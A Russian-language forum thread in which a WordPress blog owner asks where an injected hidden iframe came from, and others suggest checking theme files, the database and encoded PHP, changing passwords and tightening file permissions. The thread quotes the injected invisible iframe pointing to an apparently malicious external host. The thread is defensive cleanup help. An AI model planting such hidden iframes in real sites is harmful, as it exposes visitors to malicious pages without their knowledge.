Тяпнули фрейм ко мне в блог, не могу найти. В исходном тексте его видно:
<html><body><iframe src="http://bestlotron.cn/in.cgi?cocacola54" width=1 height=1 style="visibility: hidden"></iframe></body></html>

А в файлах не могу найти, в индексе нету, в индексе который в папке wp-content был, я его удалил, а он почему то не пропал. Куда их ещё могли распихать??

егов админке щи в стилях

егов админке щи в стилях

А поконкретней?

дай угадаю. 000webhost?

дай угадаю. 000webhost?

Нет, best-hoster.ru , был на другом хосте , тоже фреймы ставили один раз, походу в wp что то

Посмотри сдеся -
\wp-content\themes\текушая_тема\
а вобще можно записать во многие файлы, где именно вылазитет ифрейм, в начале или в конце страницы?

Редактор тем нажми там смотри
footer sidebar и т д

ищи в файлах темы, 100% там, а вообще следующий раз юзай плагин http://mywordpress.ru/plugins/belavir/

Фрейм в самом конце вылазит

Хеадер.пхп в папке с темой глянь..

если в конце после контента то посмотри в footer.php и index.php в папке с темой

удалил ещё один из индекса темы.....блять сколько их ещё...

Ставь сразу права на файлы - что бы апачь только чтения

Попробуй автоматическим поиском текста в файлах найти фреймы...

Попробуй автоматическим поиском текста в файлах найти фреймы...Они могут быть заенкодены в базе64 и гз...

Ну тс же написал что они в плаен тексте, хотя может какая то часть из них может быть с обфускацией, может также быть и в js засунули, ТС поменяй все пассы на ftp, доступы в админку, также если ты помнишь дату когда заливал на сайт файлы зделай поиск по дате изменения, хотя она легко обходиться touch.

А как в тотал командере сделать поиск текста в нескольких файлах и папках?

А как в тотал командере сделать поиск текста в нескольких файлах и папках?
alt+f7

Ну тс же написал что они в плаен текстеОни в плеин тексте при выводе, а в сорсах могут быть типа echo base64_decode("PGZyYW1lPmxpbms8L2ZyYW1lPg==");

втыкай маяки в файлы:

баш скриптом в каждый файл папки втыкай нечто:

<-- file name -->

потом уберешь это. это разобьет вывод на части и будет проще найти.

но встречал и извращенцев, которые срали переменные в одном файле, которые штатно выводил другой файл :) нашел этим способом

Может когда ты удаляешь ифрейм делаеться какая ето проверка, и если ифрейма нету то он добавляеться, для фтп есть спец скрипт для этих целей, также втречал ифрейм через include удаленого файла.

в бд проверь,там могут быть айфреймы...